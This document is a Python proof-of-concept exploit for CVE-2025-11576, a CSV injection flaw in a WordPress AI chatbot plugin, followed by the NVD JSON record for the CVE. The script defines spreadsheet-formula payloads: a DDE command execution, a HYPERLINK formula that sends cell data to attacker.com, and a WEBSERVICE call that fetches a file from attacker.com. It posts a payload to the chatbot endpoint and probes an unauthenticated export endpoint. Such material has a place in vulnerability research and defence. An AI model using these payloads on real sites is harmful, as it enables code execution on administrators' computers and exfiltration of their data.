CVE-2025-11576

# CVE-2025-11576 CSV Injection PoC # WordPress AI Chatbot Plugin <= 1.6.5 # Attack Vector: Inject malicious formula via chatbot message import requests import urllib.parse target_url = "http://target-wordpress-site.com" # Malicious payloads for CSV injection # Payload 1: Command execution via Excel formula payload_cmd = "=CMD|'/C calc'!A0" # Payload 2: Data exfiltration via HYPERLINK payload_exfil = "=HYPERLINK("http://attacker.com/steal?data="&A1)" # Payload 3: Indirect command execution payload_indirect = "=WEBSERVICE("http://attacker.com/shell.txt")" # Step 1: Send malicious payload via chatbot chatbot_endpoint = f"{target_url}/wp-json/ai-chatbot/v1/message" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } # Payload injection through chat message data = { "message": payload_cmd, "session_id": "test_session_123" } print("[*] Sending malicious payload to chatbot...") response = requests.post(chatbot_endpoint, json=data, headers=headers) if response.status_code == 200: print("[+] Payload sent successfully") print(f"[+] Response: {response.text}") else: print(f"[-] Failed to send payload: {response.status_code}") # Step 2: Wait for admin to export messages print("[*] Waiting for administrator to export CSV...") print("[*] When admin opens the CSV, the formula will execute") # Step 3: Check if export is accessible (unauthenticated) export_endpoint = f"{target_url}/wp-admin/admin-ajax.php?action=newcodebyte_export_messages" print(f"[*] Testing export endpoint: {export_endpoint}")

{"cve": {"id": "CVE-2025-11576", "sourceIdentifier": "[email protected]", "published": "2025-10-24T13:15:46.203", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AI Chatbot Free Models – Customer Support, Live Chat, Virtual Assistant plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 1.6.5. This is due to insufficient sanitization in the 'newcodebyte_chatbot_export_messages' function. This makes it possible for unauthenticated attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3378450/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5064873b-e70a-4fe6-8c5c-ced6025aaa5f?source=cve", "source": "[email protected]"}]}}